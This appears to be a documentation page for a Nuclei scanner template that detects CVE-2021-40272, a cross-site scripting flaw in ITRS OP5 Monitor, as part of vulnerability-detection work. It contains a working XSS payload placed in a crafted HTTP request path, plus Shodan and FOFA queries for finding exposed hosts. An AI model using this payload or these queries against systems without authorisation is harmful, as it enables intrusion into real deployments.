IRTS OP5 Monitor - Cross-Site Scripting
ID: CVE-2021-40272
Severity: medium
Author: ritikchaddha
Tags: cve2021,cve,irts,op5,xss
Description
Section titled “Description”OP5 Monitor 8.3.1, 8.3.2, and OP5 8.3.3 are vulnerable to Cross Site Scripting (XSS).
YAML Source
Section titled “YAML Source”id: CVE-2021-40272
info: name: IRTS OP5 Monitor - Cross-Site Scripting author: ritikchaddha severity: medium description: | OP5 Monitor 8.3.1, 8.3.2, and OP5 8.3.3 are vulnerable to Cross Site Scripting (XSS). impact: | Successful exploitation could lead to unauthorized access or data theft. remediation: | Update to the latest version of OP5 Monitor to mitigate the XSS vulnerability. reference: - https://github.com/hosakauk/exploits/blob/master/itrs_op5_monitor_xss.pdf - https://nvd.nist.gov/vuln/detail/CVE-2021-40272 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cve-id: CVE-2021-40272 cwe-id: CWE-79 cpe: cpe:2.3:a:op5:monitor:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"ITRS" fofa-query: title="ITRS" product: monitor vendor: op5 tags: cve2021,cve,irts,op5,xss
http: - raw: - | GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1 Host: {{Hostname}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
host-redirects: true max-redirects: 2 matchers-condition: and matchers: - type: dsl dsl: - contains(body, "help\'onmouseover=alert(document.domain)/\'/;/beta/license?format=json\'>JSON") - contains_any(tolower(body), "op5 monitor", "itrs") - contains(content_type, "text/html") - status_code == 401 condition: and# digest: 4a0a004730450221008249fbcbc86f4dfc70b47543821415fc55598f8ee67c75bca2db2ec07f456ffc02206153a975029fda4f2a77449e889aacc68fa300cd8704741984ee6e41ead01d4a:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40272.yaml"